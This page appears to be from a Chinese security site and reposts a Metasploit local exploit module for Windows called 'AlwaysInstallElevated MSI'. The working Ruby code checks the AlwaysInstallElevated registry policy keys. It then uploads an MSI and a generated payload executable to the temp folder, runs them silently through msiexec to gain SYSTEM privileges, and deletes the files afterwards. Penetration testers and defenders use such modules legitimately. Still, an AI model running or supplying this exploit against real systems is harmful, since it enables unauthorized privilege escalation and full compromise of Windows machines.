首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Windows AlwaysInstallElevated MSI
来源:http://www.metasploit.com 作者:Anwar 发布时间:2012-11-30  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit3 < Msf::Exploit::Local
 Rank = AverageRanking

 include Msf::Exploit::EXE
 include Msf::Post::Common
 include Msf::Post::File
 include Msf::Post::Windows::Registry

 def initialize(info={})
  super(update_info(info, {
   'Name'          => 'Windows AlwaysInstallElevated MSI',
   'Description'    => %q{
     This module checks the AlwaysInstallElevated registry keys which dictate if
    .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).

    The default MSI file is data/exploits/exec_payload.msi with the WiX source file
    under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply
    executes payload.exe within the same folder.

    The MSI may not execute succesfully successive times, but may be able to get around
    this by regenerating the MSI.

    MSI can be rebuilt from the source using the WIX tool with the following commands:
    candle exec_payload.wxs
    light exec_payload.wixobj
   },
   'License'       => MSF_LICENSE,
   'Author'        =>
    [
     'Ben Campbell',
     'Parvez Anwar' # discovery?/inspiration
    ],
   'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
   'Platform'      => [ 'win' ],
   'SessionTypes'  => [ 'meterpreter' ],
   'DefaultOptions' =>
    {
     'WfsDelay' => 10,
     'EXITFUNC' => 'thread',
     'InitialAutoRunScript' => 'migrate -k -f'
    },
   'Targets'       =>
    [
     [ 'Windows', { } ],
    ],
   'References'    =>
    [
     [ 'URL', 'http://www.greyhathacker.net/?p=185' ],
     [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
     [ 'URL', 'http://wix.sourceforge.net'] ,
    ],
   'DisclosureDate'=> 'Mar 18 2010',
   'DefaultTarget' => 0
  }))

  register_advanced_options([
   OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),
   OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])
  ], self.class)
 end

 def check
  install_elevated = "AlwaysInstallElevated"
  installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
  hkcu = "HKEY_CURRENT_USER\\#{installer}"
  hklm = "HKEY_LOCAL_MACHINE\\#{installer}"

  local_machine_value = registry_getvaldata(hklm,install_elevated)

  if local_machine_value.nil?
   print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
   return Msf::Exploit::CheckCode::Safe
  elsif local_machine_value == 0
   print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
   return Msf::Exploit::CheckCode::Safe
  else
   print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
   current_user_value = registry_getvaldata(hkcu,install_elevated)
  end

  if current_user_value.nil?
   print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
   return Msf::Exploit::CheckCode::Safe
  elsif current_user_value == 0
   print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
   return Msf::Exploit::CheckCode::Safe
  else
   print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
   return Msf::Exploit::CheckCode::Vulnerable
  end
 end

 def cleanup
  if not @executed
   return
  end

  begin
   print_status("Deleting MSI...")
   file_rm(@msi_destination)
  rescue Rex::Post::Meterpreter::RequestError => e
   print_error(e.to_s)
   print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.")
  end

  begin
   print_status("Deleting Payload...")
   file_rm(@payload_destination)
  rescue Rex::Post::Meterpreter::RequestError => e
   print_error(e.to_s)
   print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.")
  end
 end

 def exploit

  if check != Msf::Exploit::CheckCode::Vulnerable
   @executed = false
   return
  end

  @executed = true

  msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
  msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")

  # Upload MSI
  @msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped
  print_status("Uploading the MSI to #{@msi_destination} ...")

  #upload_file - ::File.read doesn't appear to work in windows...
  source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
  write_file(@msi_destination, source)

  # Upload payload
  payload = generate_payload_exe
  @payload_destination = expand_path("%TEMP%\\payload.exe").strip
  print_status("Uploading the Payload to #{@payload_destination} ...")
  write_file(@payload_destination, payload)

  # Execute MSI
  print_status("Executing MSI...")

  if datastore['LOG_FILE'].nil?
   logging = ""
  else
   logging = "/l* #{datastore['LOG_FILE']} "
  end

  if datastore['QUIET']
   quiet = "/quiet "
  else
   quiet = ""
  end

  cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}"
  vprint_status("Executing: #{cmd}")
  begin
   result = cmd_exec(cmd)
  rescue Rex::TimeoutError
   vprint_status("Execution timed out.")
  end
  vprint_status("MSI command-line feedback: #{result}")
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Network Shutdown Module <= 3.2
·Free WMA to MP3 converter v1.6
·UMPlayer Portable 0.95 Crash P
·Android 4.0.3 <= Browser Remot
·Apple QuickTime 7.7.2 MIME Typ
·IBM System Director Remote Sys
·mcrypt <= 2.6.8 stack-based bu
·MySQL (Linux) Stack Based Buff
·Aviosoft Digital TV Player Pro
·MySQL (Linux) Heap Based Overr
·BlazeVideo HDTV Player 6.6 Pro
·MySQL (Linux) Database Privile
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved